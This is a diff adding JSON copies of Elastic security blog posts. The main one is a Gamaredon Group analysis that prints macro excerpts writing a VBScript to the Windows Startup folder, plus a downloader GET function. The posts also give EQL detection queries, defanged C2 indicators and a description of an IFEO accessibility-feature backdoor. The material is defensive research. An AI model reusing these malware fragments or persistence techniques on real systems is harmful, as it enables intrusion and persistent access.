Figure 13 contains an excerpt of the beginning lines of macro code where the VBScript (security.vbs) is written to disk and placed in the startup folder.\n\n```\nDim LISPVdZd As Object\nSet LISPVdZd = GGZucIZE.CreateTextFile(FESHWDaD + \"\\Mi\" + \"croso\" + \"ft\\Wi\" + \"ndow\" + \"s\\St\" + \"art Men\" + \"u\\Pro\" + \"grams\\Sta\" + \"rtup\\secur\" + \"ity.v\" + \"b\" + \"s\", True, True)\n```\n\n_Figure 13 - Macro code writing VBScript file (security.vbs)_\n\nUpon rebooting or successfully authenticating to an infected system, the persistent VBScript file is automatically executed and a standard HTTP GET request is made with the previously observed URI (Figure 14). If the request is successful, the response body is stored in another variable. This functionality appears to serve as a downloader that has specific subroutine instructions for reassembling a binary on disk. Figure 14 contains an excerpt of the function used to construct the HTTP GET request.\n\n```\nFunction TOGeMFBD(iWotBBKf)\nOn Error Resume Next\nSet EXJJrRlN = CreateObject(\"MSXML2.XMLHTTP\")\nWith EXJJrRlN\n.Open \"GET\", iWotBBKf, False\n.send\nEnd With\nIf EXJJrRlN.Status = 200 Then\nTOGeMFBD = EXJJrRlN.ResponseBody\nEnd If\nEnd Function\n```\n\n_Figure 14 - GET request (security.vbs)_\n\nDuring dynamic analysis, analysts identified that the script enters a loop while sending the request. A 0-byte file is created under the infected user’s roaming profile with a procedurally generated file name and text file extension. The file is iteratively written and deleted without the contents changing.\n\nAnalysts have not confirmed the purpose of this file, but suspect it is used to reassemble a segmented later-stage implant. 
Potential reasons to obfuscate this process include evading detection and response solutions.\n\n## Pteranodon update\n\nWhile doing this research, we observed samples and artifacts that appear to be related to an updated version of the Gamaredon Group’s custom backdoor, known as [Pteranodon](https://attack.mitre.org/software/S0147/). Although we don’t have substantial evidence that Pteranodon is the final payload victims are infected with during this campaign, we assess with moderate confidence that this activity is linked to Gamaredon Group.\n\nThree PE samples were uploaded to VirusTotal last month, each dropping two text files ([ExcelMyMacros.vba](https://www.virustotal.com/gui/file/c4089686965df5e52105b6eac06703aa11c4891695278446370f623d531b505e/details), [wordMacros.vba](https://www.virustotal.com/gui/file/02e6e2bfaaf6e77cfaccadaf26167135c53cf2c934d17c5a83e5bbcadd85b47d/details)). The two text files share several similarities with the VBA macro code found in the remote templates used in this campaign — specifically, the methods of retrieving and hex-encoding the serial number and similar subroutine logic. 
Figure 15 depicts the VBA macro code from the remote template (top) and the dropped VBA macro code from a known Pteranodon implant (bottom).\n\n**VBA from Campaign**\n\n```\nFor LfJesrvH = 0 To UBound( IvAPFGDD )\" + vbCrLf\nLISPVdZd.Write \"IvAPFGDD(LfJesrvH) = Asc( Mid( EaCJFwPc, LfJesrvH + 1, 1 ) )\" + vbCrLf\nLISPVdZd.Write \"Next\" + vbCrLf\nLISPVdZd.Write \"GetFEDzCjgi = IvAPFGDD\" + vbCrLf\n```\n\n**VBA from Pteranodon**\n\n```\nFor i = 0 To UBound( asrrCodes )\" + vbCrLf\nNewVDJKpCBSFile.Write \" asrrCodes(i) = Asc( Mid( myPassPhrase, i + 1, 1 ) )\" + vbCrLf\nNewVDJKpCBSFile.Write \" Next\" + vbCrLf\nNewVDJKpCBSFile.Write \" GetKey = asrrCodes\" + vbCrLf\n```\n\n_Figure 15 - Macro comparison - VBA from Campaign (top) vs VBA from Pteranodon (bottom)_\n\nBoth text files contained VBA and had the same functionality for disabling macro warnings, creating a persistent VBScript in the startup folder, and establishing connections to C2. What’s interesting about the dropped text files is that they show the true variable names used by the developers before their tooling obfuscates the variables. At the time of this writing, each of the four C2 servers (see attached indicators) affiliated with Pteranodon samples was active and hosted on a network allocated to ASN9123 (TIMEWEB LTD). Macro code associated with the Gamaredon Group campaign targeting Ukrainian officials called back to C2 hosted on the same network.\n\nAn interesting change in some of these artifacts appears to be the adoption of .NET. Along with the two text files containing VBA code, there are three dropped DLLs (Microsoft.Office.Interop.Excel.dll, Microsoft.Office.Interop.Word.dll, Microsoft.Vbe.Interop.dll) and a .NET [sample](https://www.virustotal.com/gui/file/145a61a14ec6d32b105a6279cd943317b41f1d27f21ac64df61bcdd464868edd/details) showing dependencies on these files. Figure 16 shows a hex-encoded reference to one of the VBA files (wordMacros.txt). 
Based on these observations, it’s intriguing to see Gamaredon Group continue to leverage core functionality of their VBA stager code, but with a new method of execution using .NET.\n\n\n\n_Figure 16 - .NET reference to “wordMacros.txt”_\n\n## Detection crafting\n\nFor organizations interested in detecting TTPs discussed in this blog post, detection logic has been provided for the following categories:\n\n### Dynamic DNS\n\n[Dynamic DNS](https://attack.mitre.org/techniques/T1311/) enables adversaries to rapidly provision very large numbers of records that map back to their infrastructure, creating a confusion layer between victims and adversaries. Gamaredon Group exclusively used Dynamic DNS locations for remotely hosted templates, rotating domains consistently, and leveraging separate infrastructure for hosting stagers and templates.\n\nProfiling Dynamic DNS for your enterprise is an amazing way to get started hunting — not just to baseline and build environmental awareness, but also to outright find evil. We will primarily focus on the two Dynamic DNS providers observed in relation to this campaign. 
If you need inspiration, consider counting up all non-browser processes that made a DNS request to one of these Dynamic DNS providers as shown in Figure 17.\n\n```\ndns where wildcard(query_name, \"*.ddns.net\", \"*.hopto.org\", \"*.bounceme.net\") and\nprocess_name not in (\"chrome.exe\",\"iexplore.exe\", \"firefox.exe\")\n| count process_name, query_name\n```\n\n_Figure 17 - EQL query - Count of non-browser processes to dynamic DNS providers_\n\nAnother option examines the processes that most frequently communicate with these providers, and may provide more context regarding how dynamic DNS is used in your environment, or enable an analyst to find signs of other malicious activity.\n\n```\nnetwork where event of\n[dns where wildcard(query_name, \"*.ddns.net\", \"*.hopto.org\", \"*.bounceme.net\")]\n| count process_name, total_in_bytes, total_out_bytes\n```\n\n_Figure 18 - EQL query - Network traffic of processes to dynamic DNS providers_\n\n### Template Injection\n\nSpearphishing attachments that utilize [template injection](https://attack.mitre.org/techniques/T1221/) may bypass security controls because they contain no embedded VBA code. The attached document retrieves a remotely hosted template where the malicious VBA code resides. In order to detect this activity dynamically, analyze DNS and network traffic over common protocols (HTTP/HTTPS/SMB) and processes generated by Microsoft Office applications. Enterprise defenders may need to whitelist any legitimate use of remotely hosted templates, or any benign network activity to Microsoft infrastructure. 
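If you replicate these EQL wildcard filters in an external triage script, note that they follow shell-style glob semantics, which Python's fnmatch reproduces closely. A minimal sketch (event field values assumed for illustration):

```python
from fnmatch import fnmatch

DYNDNS_PATTERNS = ("*.ddns.net", "*.hopto.org", "*.bounceme.net")
ALLOWLIST = ("*.microsoft.com", "*.skype.com")  # example benign destinations

def matches_any(name: str, patterns) -> bool:
    # Lowercase first so matching is case-insensitive on every platform.
    return any(fnmatch(name.lower(), pattern) for pattern in patterns)

def is_suspect_query(query_name: str) -> bool:
    """Flag dynamic DNS lookups that do not match the allowlist."""
    return matches_any(query_name, DYNDNS_PATTERNS) and not matches_any(query_name, ALLOWLIST)

print(is_suspect_query("libcrash.ddns.net"))        # -> True
print(is_suspect_query("telemetry.microsoft.com"))  # -> False
```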
Below is an example EQL query focused on new process creation events from Office products that also made DNS requests outside our whitelist.\n\n```\nsequence by unique_pid\n[process where process_name in (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\")]\n[dns where not wildcard(query_name , \"*.microsoft.com\", \"*.skype.com\")]\n```\n\n_Figure 19 - EQL query - DNS traffic from Office applications_\n\nWe can enhance the previous query by adding a network event to the sequence, as well as looking for a spawned child process, bringing more context into the detection.\n\n```\nsequence\n[process where process_name in (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\")] by unique_pid\n[dns where not wildcard(query_name, \"*.microsoft.com\", \"*.skype.com\")] by unique_pid\n[network where true] by unique_pid\n[process where subtype.create] by unique_ppid\n```\n\n_Figure 20 - EQL query - DNS, network, and child process activity from Office applications_\n\nIf we want to tailor a sequence-based detection to the Gamaredon Group activity specifically, we can bring in the previously observed Dynamic DNS providers, creating a more restrictive filter.\n\n```\nsequence by unique_pid\n[process where process_name in (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\")]\n[network where event of\n[dns where wildcard(query_name, \"*.ddns.net\", \"*.hopto.org\", \"*.bounceme.net\")]]\n```\n\n_Figure 21 - EQL query - Network traffic making dynamic DNS requests from Office applications_\n\nThe Elastic Endpoint prevents this attack through a range of features, including machine-learning technologies that stop advanced threats such as macro-enabled documents and malicious binaries. Along with these protections, we can deploy nearly any EQL logic in prevention mode to stop an attack outright, as in this example with the download and execution of the remote template. 
Here’s a short clip in action:\n\n\n\n### Malicious registry configuration\n\nIn order for adversaries to be effective in their mission, they often create their own opportunities. In this case, the adversary reconfigured the target endpoint in order to disable macro security warnings and trust future macros automatically. These small changes can end up having larger implications, and defenders can look for them as symptoms of more serious security issues. For example, these same techniques have also been associated with threat groups like APT32 and are leveraged by malware families such as [AgentTesla](https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html) and [BabyShark](https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/).\n\nThis query looks for evidence of the registry modifications that disable macro warnings and automatically enable future macros:\n\n```\nregistry where registry_data == 1 and wildcard(registry_path,\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\AccessVBOM\",\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\VBAWarnings\")\n```\n\n_Figure 22 - EQL query - Registry modifications around disabling macro security features_\n\nThat would function perfectly well as a standalone detection, but EQL allows us to look for both the registry modification and template injection techniques in this example query:\n\n```\nsequence by unique_pid\n[process where process_name in (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\")]\n[registry where registry_data == 1 and wildcard(registry_path,\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\AccessVBOM\",\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\VBAWarnings\")]\n[registry where registry_data == 1 and 
wildcard(registry_path,\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\AccessVBOM\",\n\"*\\\\Software\\\\Microsoft\\\\Office\\\\*\\\\Word\\\\Security\\\\VBAWarnings\")]\n```\n\n_Figure 23 - EQL query - Registry modifications around disabling macro security features_\n\n### Persistence startup\n\nGamaredon Group leveraged both malicious Windows shortcut files and script objects written to the [Startup folder](https://attack.mitre.org/techniques/T1060/) for persistence. This technique is very effective in spite of its simplicity and continues to be popular among adversaries. One of the first places to start building detection logic would be to inquire about processes that write files to the startup folder.\n\n```\nfile where subtype.create\nand (\nfile_path == \"*\\\\Programs\\\\Startup\\\\*.lnk\" or\nfile_path == \"*\\\\Programs\\\\Startup\\\\*.vbs\"\n)\n| count process_name, file_path, user_name\n```\n\n_Figure 24 - EQL query - Monitoring file writes to startup folder_\n\nTo take it a bit further, we can also customize detection logic to include the VBScript execution at logon. This is a great example for building a sequence-based signal, as we will track the adversary’s activity over an extended period of time — such as 90 days. Once the machine is rebooted or the user logs back in, an alert can be generated when WScript executes the VBScript file at startup.\n\n```\nsequence with maxspan=90d\n[file where subtype.create and file_path == \"*\\\\Programs\\\\Startup\\\\*.vbs\"]\n[process where subtype.create and parent_process_name == \"explorer.exe\" and\nprocess_name == \"wscript.exe\" and command_line == \"*\\\\Programs\\\\Startup\\\\*\"]\n```\n\n_Figure 25 - EQL query - Monitoring execution of startup processes_\n\n## Conclusion\n\nIn this post, we reviewed recent campaign TTPs tied to an adversary known publicly as Gamaredon Group. 
This group is likely to have been active since at least 2013 and has engaged in an ongoing campaign against Ukraine at the time of this writing. We highlighted some of their current techniques such as template injection and the use of Dynamic DNS providers, the macro code found in a recent sample, and updates to their custom backdoor known as Pteranodon. By using [EQL](https://www.elastic.co/blog/introducing-event-query-language), we also shared hunting and detection strategies around four specific techniques used by Gamaredon Group.\n\nWe hope that by sharing some of these insights and queries, we can help raise awareness and continue to focus on protecting the world's data from attacks. To enable organizations further, we’ve added all the Indicators of Compromise (IOCs) below and added the queries in this post into the [EQLLib repository](https://eqllib.readthedocs.io/en/latest/analytics.html).\n\nInterested in using Elastic Security? Try [Elastic SIEM](https://www.elastic.co/siem) for free.\n\nPlus, [EQL support is being added to Elasticsearch](https://github.com/elastic/elasticsearch/issues/49581)!\n\n## Indicators of Compromise (IOCs)\n\n| | |\n| ----------------------------------------- | ------------------------------------------------------------------ |\n| Lure Document SHA-256 | 86e0701349903105b0c346df9485dd59d85dd9463c2bee46d974ea1b1d7059d4 |\n| Remote Template (pos.dot) SHA-256 | feb0596e9735e03ae929d9b5ee862da19e16e5cdf57dd2a795205e591a55940f |\n| Remote Template from Lure Document Domain | document-out[.]hopto[.]org/pos[.]dot |\n| Remote Template Hosting IP | 141[.]8[.]195[.]60 |\n| Remote Template Hosting IP | 141[.]8[.]192[.]153 |\n| System Information Upload IP | 188[.]225[.]25[.]50 |\n| System Information Upload URI | libcrash.ddns[.]net/\\{Computername_SerialNumber\\}//posolreboot.php |\n| ExcelMyMacros.vba SHA-256 | c4089686965df5e52105b6eac06703aa11c4891695278446370f623d531b505e |\n| wordMacros.vba SHA-256 | 
02e6e2bfaaf6e77cfaccadaf26167135c53cf2c934d17c5a83e5bbcadd85b47d |\n| ExcelMyMacros.txt SHA-256 | 2f310c5b16620d9f6e5d93db52607f21040b4829aa6110e22ac55fab659e9fa1 |\n| Pteranodon SHA-256 | c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f |\n| Pteranodon SHA-256 | 145a61a14ec6d32b105a6279cd943317b41f1d27f21ac64df61bcdd464868edd |\n| Pteranodon Domain | beercraft[.]space |\n| Pteranodon Domain | skymage[.]fun |\n| Pteranodon Domain | masseffect[.]space |\n| Pteranodon Domain | masseffect[.]website |\n| Pteranodon IP | 185[.]200[.]241[.]88 |\n| Pteranodon IP | 188[.]225[.]46[.]94 |\n\n## References\n\n1. [https://www.anomali.com/resources/whitepapers/malicious-activity-aligning-with-gamaredon-ttps-targets-ukraine](https://www.anomali.com/resources/whitepapers/malicious-activity-aligning-with-gamaredon-ttps-targets-ukraine)\n"
+ },
+ "title": "Playing defense against Gamaredon Group",
+ "slug": "playing-defense-against-gamaredon-group",
+ "date": "2022-06-21",
+ "description": "Learn about the recent campaign of a Russia-based threat group known as Gamaredon Group. This post will review these details and provide detection strategies.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "elastic-security-intelligence-analytics-team"
+ }
+ ],
+ "image": "blog-thumb-digital-shield.jpg",
+ "category": [
+ {
+ "slug": "activity-group"
+ }
+ ]
+ },
+ "id": "security_labs_content-playing_defense_against_gamaredon_group-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-practical_security_engineering_stateful_detection-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-practical_security_engineering_stateful_detection-md.json
new file mode 100644
index 00000000000..761a9b7b0cb
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-practical_security_engineering_stateful_detection-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Practical security engineering: Stateful detection\"\nslug: \"practical-security-engineering-stateful-detection\"\ndate: \"2022-06-01\"\ndescription: \"By formalizing stateful detection in your rules, as well as your engineering process, you increase your detection coverage over future and past matches. In this blog post, learn why stateful detection is an important concept to implement.\"\nauthor:\n - slug: samir-bousseaden\nimage: \"blog-thumb-digital-shield.jpg\"\ncategory:\n - slug: security-research\n---\n\nDetection engineering at Elastic is both a set of reliable principles — or methodologies — and a collection of effective tools. In this series, we’ll share some of the foundational concepts that we’ve discovered over time to deliver resilient detection logic.\n\nIn this blog post, we will share a concept we call **stateful detection** and explain why it's important for detection.\n\n## Detection states\n\nThe quickest way to get started may not always be the best, and new analysts tend to jump right into the post-exploitation details, mapping available data sources and logic fragments. Few consider that the state of a technique may influence visibility. 
The following three states illustrate one operations-focused approach:\n\n- **Creation state:** Related to detecting suspicious or critical activity at the time of configuration or preparation (e.g., creation or modification of a new Run key registry value to detect new persistent programs)\n- **Runtime state:** Related to detecting suspicious or critical activity at the moment of execution, which may be the result of an automated process (e.g., after a program was added to the HKLM RunOnce key, it will be executed as a child process of RunOnce.exe at system startup)\n- **Cleanup state:** A special kind of runtime state related to detecting active and passive methods of covering tracks (file and registry deletion and process termination are examples of needed telemetry; e.g., deleting a startup entry)\n\nMany organizations tasked with creating detection logic focus on a given event creation state, though the following limitations are often overlooked.\n\n- There will be detection gaps for known tactics, techniques, and procedures (TTPs) at execution. 
It’s likely you’re dealing with creation-state detection logic built for these TTPs, meaning you’re only finding this behavior after the fact.\n- There will be detection gaps for techniques used by attackers who are diligent at tidying up their presence, as security operations tend to focus on detecting techniques in the earliest stages of an intrusion.\n- The required telemetry, data, and logic for one technique may be different for each state and require enabling new telemetry or changing existing configurations.\n\nThe practical application of this concept is most effective for detecting techniques in tactic categories that focus on predictable outcomes such as persistence, defense evasion (e.g., abnormal memory type and protection for code injection), and command and control (unusual process network traffic).\n\nTo make this concept clearer, let's explore an example of designing detection logic in the [Persistence](https://attack.mitre.org/tactics/TA0003/) tactic category using [T1015 - Accessibility Features](https://attack.mitre.org/techniques/T1015/). Suppose an attacker has already enabled a backdoor to execute using this technique (via Image File Execution Options - Debugger registry value) months or weeks before you’ve implemented a detection for it.\n\n\n\n_Figure 1: Depiction of image file execution options debugger abuse (1)_\n\nImage File Execution Options (IFEO) are used for debugging legitimate applications, and can be abused by an attacker with at least local administrator privileges to execute a malicious program (instead of a legitimate one) via the Debugger setting. 
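The registry artifact this technique leaves behind at configuration time is easy to describe programmatically. As a minimal sketch (illustrative Python with assumed field values, not Elastic's detection logic):

```python
# Accessibility binaries commonly targeted by IFEO Debugger hijacking.
ACCESSIBILITY_BINARIES = (
    "osk.exe", "sethc.exe", "magnify.exe",
    "narrator.exe", "displayswitch.exe", "atbroker.exe", "utilman.exe",
)
IFEO_KEY = "\\microsoft\\windows nt\\currentversion\\image file execution options\\"

def is_ifeo_accessibility_debugger(registry_path: str) -> bool:
    """Flag a Debugger value written under an IFEO subkey named after an accessibility binary."""
    path = registry_path.lower()
    return (IFEO_KEY in path
            and path.endswith("\\debugger")
            and any("\\" + exe + "\\" in path for exe in ACCESSIBILITY_BINARIES))

hijack = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\Debugger"
print(is_ifeo_accessibility_debugger(hijack))  # -> True
```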
As shown in Figure 2, cmd.exe will be executed every time the on-screen keyboard (osk.exe) is invoked, providing the attacker a system shell backdoor.\n\n\n\n_Figure 2: Depiction of image file execution options debugger abuse (2)_\n\n## **Creation state**\n\nAt the time of creation, while configuring the Debugger value, detection primarily consists of monitoring a filtered subset of the registry for new references to accessibility features (e.g., osk.exe for the On-Screen Keyboard) and the registry value name Debugger. This technique is also effective for other accessibility features depicted in Figure 3.\n\n\n\n_Figure 3: Accessibility features processes_\n\n[EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) is a language we can use to broadly describe **creation-state** detection events for any technique. Figure 4 depicts an EQL rule demonstrating one example that detects [accessibility features](https://attack.mitre.org/techniques/T1015/) using IFEO.\n\n\n\n_Figure 4: T1015 - IFEO creation state EQL example_\n\n## **Runtime state**\n\nAt the time of creation, that kind of EQL logic will help to detect the technique, but what if the configuration happened _weeks or months ago_? A different kind of EQL expression is better suited for detecting the technique in a runtime state. It begins with a little focused research.\n\nIt can help to adopt a structured approach to researching this state:\n\n1. Understand normal execution flow: Manually execute each accessibility feature, recording normal process lineage, attributes, and execution flow\n   - Document consistent parent process, process command line arguments, privilege characteristics, and process ancestry\n2. Identify hijack opportunities\n   - As an example, while it may be possible to configure a debugger for osk.exe, is it possible to configure one for utilman.exe, the parent of osk.exe?\n3. Hunt unique anomalies\n   - Identify observable characteristics of IFEO Debugger hijacking to differentiate between legitimate and malicious use of this technique (e.g., abnormal child of winlogon.exe could be caused by code injection and unrelated to T1015)\n4. Create a **runtime-state** detection EQL rule, and evaluate potential fixes to any **creation-state** detection EQL logic\n\nLet’s dig into each of these steps so that you can better understand how this process can be adapted to work with your own team.\n\n### **Understand normal execution flow**\n\nFor osk.exe, sethc.exe, magnify.exe, and narrator.exe, the expected parent process is utilman.exe. Figure 5 depicts a visualization of the normal process-tree for the on-screen keyboard accessibility feature.\n\n\n\n_Figure 5: Example of normal on-screen keyboard execution_\n\nFor sethc.exe (Sticky Keys), which can be invoked by pressing the SHIFT key five times, expected parent processes are ATBroker.exe, utilman.exe, and winlogon.exe. For Displayswitch.exe, a similarly debuggable accessibility feature that can be invoked by pressing the WIN and P keys, expected parents are svchost.exe (DCOM service not useful in the context of T1015) and winlogon.exe.\n\nUnderstanding **normal** execution will be helpful as you begin to explore less-expected execution. If we jumped right to [MITRE ATT&CK®](https://attack.mitre.org/) before analyzing normal behavior and then tried to write a rule, we wouldn’t have some of the essential context and our logic would be less effective.\n\n### **Identifying hijacking possibilities**\n\nWhile we have our benevolent researcher hats on, let’s consider how we might abuse this kind of normal execution. 
We can infer at least a few options to start with:\n\n- Attempt to abuse execution of an accessibility application (e.g., osk.exe, magnify.exe, narrator.exe) by configuring a debugger IFEO flag\n- Attempt to abuse execution of an expected non system critical parent process (e.g., utilman.exe, atbroker.exe), which is a bit more of a shot in the dark\n\nThat’s a pretty narrowly scoped set of options for now; directly abusing accessibility applications is straightforward and a good place to start.\n\n### **Hunting unique anomalies**\n\nWe need to configure our own IFEO Debugger value for each of the known accessibility feature applications, which helps highlight noteworthy toolmarks. The table below depicts commandline arguments and process ancestry observed when our benign IFEO Debugger (set to cmd.exe) was triggered. There are some clear patterns in the command_line and parent_process_path values, as shown in Figure 6.\n\n\n\n_Figure 6: T1015 - IFEO Runtime-State Anomalies (1)_\n\nThis pattern can be translated into the following **runtime-state** detection, depicted using EQL in Figure 7.\n\n\n\n_Figure 7: T1015 - IFEO Runtime-State Detection EQL (1)_\n\nNow that we’ve covered the direct abuse, what happens when we try to manipulate one of the expected parent processes? Figure 8 contains a few attempts at abusing the expected parent processes of accessibility features.\n\n\n\n_Figure 8: T1015 - IFEO Runtime State Anomalies (2)_\n\nAs is illustrated in the previous figure, the same anomaly type can be translated to the **runtime-state** detection EQL in Figure 9.\n\n\n\n_Figure 9: T1015 - IFEO runtime-state detection EQL (2)_\n\n**Tip:** Be careful about making exceptions too broad in hunting queries. 
Favor PE information over process metadata when you can, and join that with signing status for low-hanging fruit.\n\nFigure 10 depicts the graphical timeline of a **runtime-state** alert, which can detect the use of an existing T1015 backdoor.\n\n\n\n_Figure 10: T1015 - IFEO runtime-state alert example_\n\n## **Cleanup state**\n\nDetection logic for this state is often the opposite of the **creation-state** logic. Below is an example for osk.exe IFEO key deletion as logged by [sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon).\n\n\n\n_Figure 11: T1015 - IFEO cleanup-state sysmon event example_\n\nWhat significant lessons should we take away?\n\n- **runtime-state** detection requires different data (e.g., enable telemetry for child processes of utilman.exe and winlogon.exe in your sysmon configuration, use commandline value to differentiate between abnormal child processes and T1015 unique artifacts)\n- **cleanup-state** detection requires different data (e.g., registry deletion, process termination)\n- Adjust **creation-state** EQL rule by adding atbroker.exe and utilman.exe (can be abused as well)\n\n## **Beyond baseline**\n\nFor the same technique, other than monitoring files overwrite ( **creation-state** ) and process masquerading as accessibility features ( **runtime-state** ), we can also hunt and alert ( **runtime-state** ) proactively on any unusual child processes (or suspicious non-Microsoft image loads to detect [potential Image hijack](https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html)) of the accessibility features processes (osk.exe, narrator.exe, magnify.exe, sethc.exe, and DisplaySwitch.exe) — the majority of which are **childless** processes.\n\n\n\n_Figure 12: T1015 - unusual accessibility feature child process_\n\n## **Conclusion**\n\nWhen assessing existing or designing new detection logic, always ask yourself how a specific technique/procedure manifests itself at the three different states before 
marking a specific attack procedure as covered. This impacts the type of data sources and the logic details you will need to build state-resilient detections.\n\nActively scanning for existing matches to creation-state logic is an option (often used during compromise assessment), but this is not applicable to near real-time detection. It’s not always practical to create detections for specific states (e.g., due to high performance impact or difficulty obtaining the right telemetry). By formalizing the stateful-detection concept in your rules, as well as in your use-case engineering process, you increase your detection coverage in time (future and past matches).\n\nWant to give [Elastic Security](https://www.elastic.co/security) a spin? Try it free today, or experience our latest version on [Elasticsearch Service](https://www.elastic.co/elasticsearch/service) on Elastic Cloud.\n"
+ },
+ "title": "Practical security engineering: Stateful detection",
+ "slug": "practical-security-engineering-stateful-detection",
+ "date": "2022-06-01",
+ "description": "By formalizing stateful detection in your rules, as well as your engineering process, you increase your detection coverage over future and past matches. In this blog post, learn why stateful detection is an important concept to implement.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ }
+ ],
+ "image": "blog-thumb-digital-shield.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-practical_security_engineering_stateful_detection-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-primer_on_persistence_mechanisms-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-primer_on_persistence_mechanisms-md.json
new file mode 100644
index 00000000000..2e8c0607fda
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-primer_on_persistence_mechanisms-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Linux Detection Engineering - A primer on persistence mechanisms\"\nslug: \"primer-on-persistence-mechanisms\"\ndate: \"2024-08-21\"\nsubtitle: \"A walkthrough on how threat actors establish persistence on Linux systems and how to hunt for these techniques.\"\ndescription: \"In this second part of the Linux Detection Engineering series, we map multiple Linux persistence mechanisms to the MITRE ATT&CK framework, explain how they work, and how to detect them.\"\nauthor:\n - slug: ruben-groenewoud\nimage: \"primer-on-persistence-mechanisms.jpg\"\ncategory:\n - slug: detection-science\ntags:\n - linux\n - persistence\n---\n\n## Introduction\n\nIn this second part of the Linux Detection Engineering series, we'll examine Linux persistence mechanisms in detail, starting with common or straightforward methods and moving toward more complex or obscure techniques. The goal is to educate defenders and security researchers on the foundational aspects of Linux persistence techniques by examining both trivial and more complicated methods, understanding how these methods work, how to hunt for them, and how to develop effective detection strategies.\n\nFor those who missed the first part, \"Linux Detection Engineering with Auditd\", it can be found [here](https://www.elastic.co/security-labs/linux-detection-engineering-with-auditd).\n\nFor this installment, we'll set up the persistence mechanisms, analyze the logs, and observe the potential detection opportunities. To aid in this process, we’re sharing [PANIX](https://github.com/Aegrah/PANIX), a Linux persistence tool developed by Ruben Groenewoud of Elastic Security. 
PANIX simplifies and customizes persistence setup to test your detections.\n\nBy the end of this article, you'll have a solid understanding of each persistence mechanism we describe, including:\n* How it works (theory)\n* How to set it up (practice)\n* How to detect it (SIEM and Endpoint rules)\n* How to hunt for it (ES|QL and OSQuery hunts)\n\nStep into the world of Linux persistence with us; it’s fun!\n\n## What is persistence?\n\nLet’s start with the basics. [Persistence](https://attack.mitre.org/tactics/TA0003/) refers to an attacker's ability to maintain a foothold in a compromised system or network even after reboots, password changes, or other attempts to remove them.\n\nPersistence is crucial for attackers, ensuring extended access to the target environment. This enables them to gather intelligence, understand the environment, move laterally through the network, and work towards achieving their objectives.\n\nGiven that most malware attempts to establish some form of persistence automatically, this phase is critical for defenders to understand. Ideally, attacks should be detected and prevented during initial access, but this is not always possible. Many malware samples also leverage multiple persistence techniques to ensure continued access. Notably, these persistence mechanisms can often be detected with robust defenses in place.\n\nEven if an attack is detected and the initial access vector is patched and mitigated, any leftover persistence mechanism can allow the attackers to regain access and resume their operations. Therefore, it's essential to monitor the establishment of some persistence mechanisms close to real time and hunt others regularly.\n\nTo support this effort, Elastic utilizes the MITRE ATT&CK framework as the primary lexicon for categorizing techniques in most of our detection artifacts. 
[MITRE ATT&CK](https://attack.mitre.org/matrices/enterprise/) is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. It is commonly used as a foundation for developing specific threat models and methodologies within the field of cybersecurity. By leveraging this comprehensive framework, we enhance our ability to detect, understand, and mitigate persistent threats effectively.\n\n## Setup\n\nTo ensure you are prepared to detect the persistence mechanisms discussed in this article, [enabling and updating our pre-built detection rules is important](https://www.elastic.co/guide/en/security/current/prebuilt-rules-management.html#update-prebuilt-rules). If you are working with a custom-built ruleset and do not use all of our pre-built rules, this is a great opportunity to test them and fill in any gaps.\n\nTo install, enable, and update our pre-built rules, follow these steps:\n\n1. Navigate to Kibana → Security → Rules → Detection rules (SIEM).\n2. You will find your installed and potential new and/or updated pre-built rules here.\n3. Use the \"Add Elastic rules\" button to add the latest Elastic pre-built rules.\n4. Use the \"Rule Updates\" tab to update existing rules.\n\nNow, we are ready to get started. \n\n## T1053 - scheduled task/job\n\nAutomating routine tasks is common in Unix-like operating systems for system maintenance. Some common utilities used for task scheduling are [cron](https://www.man7.org/linux/man-pages/man8/cron.8.html) and [at](https://man7.org/linux/man-pages/man1/at.1p.html). MITRE details information related to this technique under the identifier [T1053](https://attack.mitre.org/techniques/T1053/). \n\n### T1053.003 - scheduled task/job: Cron\n\n[Cron](https://www.man7.org/linux/man-pages/man8/cron.8.html) is a utility for scheduling recurring tasks to run at specific times or intervals. It is available by default on most Linux distributions. 
